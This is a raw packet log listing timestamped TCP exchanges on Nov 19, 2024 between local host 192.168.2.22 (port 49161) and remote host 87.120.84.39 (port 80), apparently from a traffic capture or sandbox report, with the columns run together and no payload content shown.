                                                                                                                                  Nov 19, 2024 18:08:04.579050064 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579050064 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579050064 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579050064 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579050064 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579216957 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.579307079 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579307079 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579307079 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579572916 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.579588890 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.579600096 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.579610109 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.579619884 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.579627991 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579628944 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.579627991 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579643011 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.579734087 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579734087 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.579734087 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.587512970 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.587620020 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.587629080 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.587657928 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.587657928 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.587707996 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.587718964 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.587728977 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.587745905 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.587784052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.587784052 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.587785006 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.587872982 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.587912083 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.587923050 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.587937117 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.587982893 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.587982893 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588038921 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588051081 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588061094 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588072062 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588115931 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588115931 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588115931 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588188887 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588200092 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588210106 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588222027 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588289976 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588289976 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588289976 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588462114 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588474035 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588486910 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588509083 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588531017 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588593006 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588603020 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588613033 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588674068 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588674068 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588713884 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588747978 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588758945 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588825941 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588835955 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588846922 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.588855028 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588855028 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588855028 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588855028 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.588877916 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589134932 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589145899 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589157104 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589196920 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589198112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589198112 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589210033 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589226007 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589236975 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589307070 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589317083 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589323997 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589323997 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589323997 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589323997 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589328051 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589339972 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589354992 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589358091 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589358091 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589366913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589395046 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589406967 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589411974 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589411974 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589411974 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589426041 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.589459896 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589459896 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.589996099 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.590039015 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.590049982 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.590071917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.590071917 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.590101957 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.590112925 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.590122938 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.590133905 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.590137959 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.590137959 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.590146065 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.590157032 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.590157986 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.590167999 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.590188026 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.590188026 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.590204000 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.592628956 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.592694998 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.592705965 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.592757940 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.593295097 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.593346119 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.593355894 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.593404055 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.593415022 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.593425989 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.593434095 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.593434095 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.593434095 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.593435049 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.593456984 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.593456984 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.593480110 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.665864944 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.665889025 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.665904045 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.665916920 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.665929079 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.665985107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.665985107 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.666038036 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666049004 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666059971 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666071892 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666083097 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666094065 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666126966 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666136980 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666152000 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666162014 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666189909 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.666189909 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.666189909 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.666189909 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.666189909 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.666189909 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.666189909 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.666218996 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.666232109 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666244030 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.666305065 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.666423082 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.706052065 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.706064939 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.706074953 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.706150055 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.706150055 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.706804037 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.706815004 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.706824064 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.706854105 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.706864119 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.706882954 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.706893921 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.706922054 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.706922054 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.706922054 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.706922054 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.706923008 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.706923008 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707389116 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707400084 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707410097 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707421064 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707431078 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707441092 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707452059 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707462072 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707472086 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707480907 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707490921 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707500935 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707501888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707501888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707501888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707501888 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707503080 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707515001 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707525015 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707545996 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707562923 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707578897 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707592010 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707604885 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707611084 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707611084 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707616091 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707628012 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707628012 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707638979 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707648993 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707650900 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707650900 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707660913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707664967 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707673073 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707684040 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707693100 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707703114 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707712889 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707721949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707721949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707721949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707725048 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707721949 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707736015 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707741976 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707747936 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707757950 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707762003 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707770109 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.707779884 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707779884 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707825899 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.707974911 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725538969 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725552082 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725562096 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725604057 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725604057 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725815058 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725825071 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725836039 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725846052 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725856066 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725864887 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725877047 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725883007 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725883007 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725883007 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725920916 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725925922 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725925922 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725934029 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.725980997 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.725980997 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726092100 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726103067 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726113081 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726129055 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726135015 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726144075 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726149082 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726162910 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726177931 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726188898 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726197004 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726200104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726200104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726200104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726200104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726200104 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726207972 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726221085 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726242065 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726242065 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726243019 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726243019 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726269007 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726278067 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726289034 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726341963 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726341963 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726351976 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726361990 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726371050 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726382017 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726394892 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726408005 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726408005 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726411104 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726423025 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726433039 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726433039 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726445913 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726457119 CET804916187.120.84.39192.168.2.22
                                                                                                                                  Nov 19, 2024 18:08:04.726475954 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726475954 CET4916180192.168.2.2287.120.84.39
                                                                                                                                  Nov 19, 2024 18:08:04.726475954 CET4916180192.168.2.2287.120.84.39
